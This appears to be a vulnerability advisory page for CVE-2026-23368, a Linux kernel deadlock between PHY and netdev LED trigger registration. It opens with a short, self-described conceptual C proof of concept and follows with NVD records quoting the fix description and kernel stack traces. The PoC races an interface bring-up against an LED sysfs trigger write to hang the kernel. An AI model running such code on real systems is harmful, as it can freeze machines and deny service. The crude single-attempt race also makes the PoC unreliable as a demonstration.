CVE-2026-23368

/* * PoC for CVE-2026-23368 (Conceptual) * This script attempts to trigger the AB-BA deadlock by racing * a network interface 'up' operation against an LED trigger write. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> void trigger_led() { // Path may vary depending on hardware configuration const char *trigger_path = "/sys/class/leds/phy0/trigger"; int fd = open(trigger_path, O_WRONLY); if (fd >= 0) { write(fd, "netdev", 6); close(fd); } } void bring_up_netdev() { // Replace eth0 with actual interface managed by the PHY system("ip link set eth0 up"); } int main() { pid_t pid = fork(); if (pid == 0) { bring_up_netdev(); // Thread 1: Holds rtnl_mutex, wants triggers_list_lock } else { usleep(20000); // Attempt to hit the race window trigger_led(); // Thread 2: Holds triggers_list_lock, wants rtnl_mutex } return 0; }

{"cve": {"id": "CVE-2026-23368", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:36.167", "lastModified": "2026-04-24T18:41:33.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: register phy led_triggers during probe to avoid AB-BA deadlock\n\nThere is an AB-BA deadlock when both LEDS_TRIGGER_NETDEV and\nLED_TRIGGER_PHY are enabled:\n\n[ 1362.049207] [<8054e4b8>] led_trigger_register+0x5c/0x1fc <-- Trying to get lock \"triggers_list_lock\" via down_write(&triggers_list_lock);\n[ 1362.054536] [<80662830>] phy_led_triggers_register+0xd0/0x234\n[ 1362.060329] [<8065e200>] phy_attach_direct+0x33c/0x40c\n[ 1362.065489] [<80651fc4>] phylink_fwnode_phy_connect+0x15c/0x23c\n[ 1362.071480] [<8066ee18>] mtk_open+0x7c/0xba0\n[ 1362.075849] [<806d714c>] __dev_open+0x280/0x2b0\n[ 1362.080384] [<806d7668>] __dev_change_flags+0x244/0x24c\n[ 1362.085598] [<806d7698>] dev_change_flags+0x28/0x78\n[ 1362.090528] [<807150e4>] dev_ioctl+0x4c0/0x654 <-- Hold lock \"rtnl_mutex\" by calling rtnl_lock();\n[ 1362.094985] [<80694360>] sock_ioctl+0x2f4/0x4e0\n[ 1362.099567] [<802e9c4c>] sys_ioctl+0x32c/0xd8c\n[ 1362.104022] [<80014504>] syscall_common+0x34/0x58\n\nHere LED_TRIGGER_PHY is registering LED triggers during phy_attach\nwhile holding RTNL and then taking triggers_list_lock.\n\n[ 1362.191101] [<806c2640>] register_netdevice_notifier+0x60/0x168 <-- Trying to get lock \"rtnl_mutex\" via rtnl_lock();\n[ 1362.197073] [<805504ac>] netdev_trig_activate+0x194/0x1e4\n[ 1362.202490] [<8054e28c>] led_trigger_set+0x1d4/0x360 <-- Hold lock \"triggers_list_lock\" by down_read(&triggers_list_lock);\n[ 1362.207511] [<8054eb38>] led_trigger_write+0xd8/0x14c\n[ 1362.212566] [<80381d98>] sysfs_kf_bin_write+0x80/0xbc\n[ 1362.217688] [<8037fcd8>] kernfs_fop_write_iter+0x17c/0x28c\n[ 1362.223174] [<802cbd70>] vfs_write+0x21c/0x3c4\n[ 1362.227712] [<802cc0c4>] ksys_write+0x78/0x12c\n[ 1362.232164] [<80014504>] syscall_common+0x34/0x58\n\nHere LEDS_TRIGGER_NETDEV is being enabled on an LED. It first takes\ntriggers_list_lock and then RTNL. A classical AB-BA deadlock.\n\nphy_led_triggers_registers() does not require the RTNL, it does not\nmake any calls into the network stack which require protection. There\nis also no requirement the PHY has been attached to a MAC, the\ntriggers only make use of phydev state. This allows the call to\nphy_led_triggers_registers() to be placed elsewhere. PHY probe() and\nrelease() don't hold RTNL, so solving the AB-BA deadlock."}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\nnet: phy: registrar los led_triggers del phy durante la sonda para evitar un interbloqueo AB-BA\n\nExiste un interbloqueo AB-BA cuando tanto LEDS_TRIGGER_NETDEV como LED_TRIGGER_PHY están habilitados:\n\n[ 1362.049207] [&lt;8054e4b8&gt;] led_trigger_register+0x5c/0x1fc &lt;-- Intentando obtener el bloqueo 'triggers_list_lock' a través de down_write(&amp;triggers_list_lock);\n[ 1362.054536] [&lt;80662830&gt;] phy_led_triggers_register+0xd0/0x234\n[ 1362.060329] [&lt;8065e200&gt;] phy_attach_direct+0x33c/0x40c\n[ 1362.065489] [&lt;80651fc4&gt;] phylink_fwnode_phy_connect+0x15c/0x23c\n[ 1362.071480] [&lt;8066ee18&gt;] mtk_open+0x7c/0xba0\n[ 1362.075849] [&lt;806d714c&gt;] __dev_open+0x280/0x2b0\n[ 1362.080384] [&lt;806d7668&gt;] __dev_change_flags+0x244/0x24c\n[ 1362.085598] [&lt;806d7698&gt;] dev_change_flags+0x28/0x78\n[ 1362.090528] [&lt;807150e4&gt;] dev_ioctl+0x4c0/0x654 &lt;-- Mantiene el bloqueo 'rtnl_mutex' al llamar a rtnl_lock();\n[ 1362.094985] [&lt;80694360&gt;] sock_ioctl+0x2f4/0x4e0\n[ 1362.099567] [&lt;802e9c4c&gt;] sys_ioctl+0x32c/0xd8c\n[ 1362.104022] [&lt;80014504&gt;] syscall_common+0x34/0x58\n\nAquí LED_TRIGGER_PHY está registrando los disparadores LED durante phy_attach mientras mantiene RTNL y luego toma triggers_list_lock.\n\n[ 1362.191101] [&lt;806c2640&gt;] register_netdevice_notifier+0x60/0x168 &lt;-- Intentando obtener el bloqueo 'rtnl_mutex' a través de rtnl_lock();\n[ 1362.197073] [&lt;805504ac&gt;] netdev_trig_activate+0x194/0x1e4\n[ 1362.202490] [&lt;8054e28c&gt;] led_trigger_set+0x1d4/0x360 &lt;-- Mantiene el bloqueo 'triggers_list_lock' mediante down_read(&amp;triggers_list_lock);\n[ 1362.207511] [&lt;8054eb38&gt;] led_trigger_write+0xd8/0x14c\n[ 1362.212566] [&lt;80381d98&gt;] sysfs_kf_bin_write+0x80/0xbc\n[ 1362.217688] [&lt;8037fcd8&gt;] kernfs_fop_write_iter+0x17c/0x28c\n[ 1362.223174] [&lt;802cbd70&gt;] vfs_write+0x21c/0x3c4\n[ 1362.227712] [&lt;802cc0c4&gt;] ksys_write+0x78/0x12c\n[ 1362.232164] [&lt;80014504&gt;] syscall_common+0x34/0x58\n\nAquí LEDS_TRIGGER_NETDEV está siendo habilitado en un LED. Primero toma triggers_list_lock y luego RTNL. Un interbloqueo AB-BA clásico.\n\nphy_led_triggers_registers() no requiere el RTNL, no realiza ninguna ll ... (truncated)